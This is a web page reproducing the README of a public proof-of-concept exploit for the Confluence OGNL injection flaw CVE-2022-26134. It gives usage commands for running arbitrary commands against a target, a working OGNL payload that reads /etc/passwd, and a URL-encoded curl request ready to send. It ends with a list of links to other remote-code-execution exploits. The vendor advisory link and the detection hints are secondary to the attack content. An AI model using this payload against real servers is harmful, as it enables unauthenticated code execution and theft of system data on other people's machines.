[PoC] Atlassian Confluence (CVE-2022-26134) - Unauthenticated OGNL injection vulnerability (RCE)

Overview

CVE-2022-26134 - OGNL injection vulnerability.

Script proof of concept that exploits the remote code execution vulnerability affecting Atlassian Confluence 7.18 and lower products. The OGNL injection vulnerability allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.

Affected versions

All supported versions of Confluence Server and Data Center are affected.
Confluence Server and Data Center versions after 1.3.0 and bellow 7.18.1 are affected.
The vulnerability has a CVSS score of 10 out of 10 for criticality.

Dependencies:

  • Python 3.3+
  • The dependencies can be satisfied via pip install -r requirements.txt

How to use:

Clone the repo

git clone https://github.com/Nwqda/CVE-2022-26134
cd CVE-2022-26134

Then you can run the exploit with the command of your choice as follow:

python3 cve-2022-26134.py https://target.com CMD
python3 cve-2022-26134.py https://target.com id
python3 cve-2022-26134.py https://target.com "ps aux"

Video Proof of Concept

Script PoC CVE-2022-26134

Video PoC CVE-2022-26134 OGNL injection Atlassian Confluence

Payload

${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

Example with CURL command:

curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D" 

Then, the result of the command will be reflected in the parameter X-Cmd-Response in the response header.

Mitigations guidelines from vendors

Follow the official recommendations from Atlassian:
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

Patched Versions

Atlassian released versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 which contain a patch for this issue.

Detect capabilities

This vulnerability affects all self-hosted instances. If you use a WAF you can block URLS with ${ inside.

YARA (by Volexity): https://github.com/volexity/threat-intel/blob/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators/yara.yar

Note

FOR EDUCATIONAL PURPOSE ONLY.

CVE-2022-26134 meme fire

You might also like...

PoC for CVE-2022-22954 - VMware Workspace ONE Access Freemarker Server-Side Template Injection

PoC for CVE-2022-22954 - VMware Workspace ONE Access Freemarker Server-Side Template Injection

CVE-2022-22954 PoC - VMware Workspace ONE Access Freemarker Server-Side Template Injection A vulnerability, which was classified as very critical, was

Nov 6, 2022

Apache Spark Command Injection PoC Exploit for CVE-2022-33891

CVE-2022-33891 PoC PoC for CVE-2022-33891, with ability to set custom payloads. Not vulnerable by default; vulnerable when: ./spark-submit --conf spar

Nov 9, 2022

Somewhat Reliable PoC Exploit for CVE-2022-36804 (BitBucket Critical Command Injection)

CVE-2022-36804-PoC-Exploit A somewhat reliable PoC exploit for CVE-2022-36804 (BitBucket Critical Command Injection). This attack generally requires p

Oct 25, 2022

ProxyNotShell and CVE-2022-41040 and CVE-2022-41082 #RCE #Exploit

ProxyNotShell and CVE-2022-41040 and CVE-2022-41082 #RCE #Exploit

ProxyNotShell ProxyNotShell and CVE-2022-41040 and CVE-2022-41082 Microsoft confirmed the two new zero-day vulnerabilities are being used in attacks a

Oct 9, 2022

CVE-2022-26134 Proof of Concept

Through the Wire Through the Wire is a proof of concept exploit for CVE-2022-26134, an OGNL injection vulnerability affecting Atlassian Confluence Ser

Oct 29, 2022

CVE-2022-32548-RCE-POC

CVE-2022-32548-RCE-POC

CVE-2022-32548-RCE-POC DrayTek unauthenticated remote code execution vulnerability (CVE-2022-32548) in /cgi-bin/wlogin.cgi via username field Technica

Sep 20, 2022

CVE-2022-39197 RCE POC

CVE-2022-39197 RCE POC

CVE-2022-39197-RCE First This project was modified from @its-arun project https://github.com/its-arun/CVE-2022-39197 When I tested the script, I found

Nov 9, 2022

App with Server Side Template Injection (SSTI) vulnerability - in Flask. For web penetration testing / ethical hacking. Possible RCE :)

App with Server Side Template Injection (SSTI) vulnerability - in Flask. For web penetration testing / ethical hacking. Possible RCE :)

Vulnerable Web App: ssti-flask-hacking-playground This is small application vulnerable to Server Side Template Injection (SSTI) in Flask/Jinja2. The v

Nov 21, 2022

the metasploit script(POC) about CVE-2022-41040. Microsoft Exchange are vulnerable to a server-side request forgery (SSRF) attack. An authenticated attacker can use the vulnerability to elevate privileges.

the metasploit script(POC) about CVE-2022-41040. Microsoft Exchange are vulnerable to a server-side request forgery (SSRF) attack. An authenticated attacker can use the vulnerability to elevate privileges.

CVE-2022-41040-metasploit-ProxyNotShell the metasploit script(POC) about CVE-2022-41040. Microsoft Exchange are vulnerable to a server-side request fo

Nov 16, 2022
Owner
Samy Younsi
Finding bugs and writing codes that break codes.‎
Samy Younsi
Confluence OGNL expression injected RCE(CVE-2022-26134) poc and exp

CVE-2022-26134 Confluence OGNL expression injected RCE(CVE-2022-26134) poc and exp Usage Edit the python script. if __name__ == '__main__': taget

SNCKER 29 Nov 2, 2022
Exploit for CVE-2022-26134: Confluence Pre-Auth Remote Code Execution via OGNL Injection

Exploit for CVE-2022-26134: Confluence Pre-Auth Remote Code Execution via OGNL Injection Another exploit in OGNL Land Description Confluence is a web-

whokilleddb 4 Jul 29, 2022
CVE-2022-26134 - Pre-Auth Remote Code Execution via OGNL Injection

[-] CVE-2022-26134 - Confluence Pre-Auth Remote Code Execution via OGNL Injection Usage usage: exploit.py [-h] [-f FILE] [-c CMD] [-p LPORT] [-l LHOST

Chocapik 8 Oct 16, 2022
CVE-2022-24990 TerraMaster TOS unauthenticated RCE via PHP Object Instantiation

CVE-2022-24990 CVE-2022-24990 TerraMaster TOS unauthenticated RCE via PHP Object Instantiation Usage Vulnerability Detection. python CVE-2022-24990.py

M4rtin Hsu 12 Jul 22, 2022
CVE-2022-24500 Windows SMB Unauthenticated Remote Code Execution Vulnerability

CVE-2022-24500-RCE CVE-2022-24500 Windows SMB Remote Code Execution Vulnerability UNAUTHENTICATED RCE IN SMB (PORT 445) AFFECTING ALL VERSIONS OF WIND

Daro 1 Aug 17, 2022
DrayTek unauthenticated remote code execution vulnerability (CVE-2022-32548) in /cgi-bin/wlogin.cgi via username field

CVE-2022-32548-RCE-POC DrayTek unauthenticated remote code execution vulnerability (CVE-2022-32548) in /cgi-bin/wlogin.cgi via username field Technica

null 1 Sep 13, 2022
DrayTek unauthenticated remote code execution vulnerability (CVE-2022-32548) in /cgi-bin/wlogin.cgi via username field

CVE-2022-32548-RCE-POC DrayTek unauthenticated remote code execution vulnerability (CVE-2022-32548) in /cgi-bin/wlogin.cgi via username field Technica

null 1 Sep 16, 2022
DrayTek unauthenticated remote code execution vulnerability (CVE-2022-32548) in /cgi-bin/wlogin.cgi via username field

CVE-2022-32548-RCE-POC DrayTek unauthenticated remote code execution vulnerability (CVE-2022-32548) in /cgi-bin/wlogin.cgi via username field Technica

null 1 Sep 20, 2022
DrayTek unauthenticated remote code execution vulnerability (CVE-2022-32548) in /cgi-bin/wlogin.cgi via username field

CVE-2022-32548-Mass-Rce DrayTek unauthenticated remote code execution vulnerability (CVE-2022-32548) in /cgi-bin/wlogin.cgi via username field Technic

null 1 Sep 29, 2022
Oracle Access Manager Unauthenticated Attacker Vulnerability CVE-2021-35587

CVE-2021-35587 Description POC for CVE-2021-35587: Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to co

antx 35 Nov 9, 2022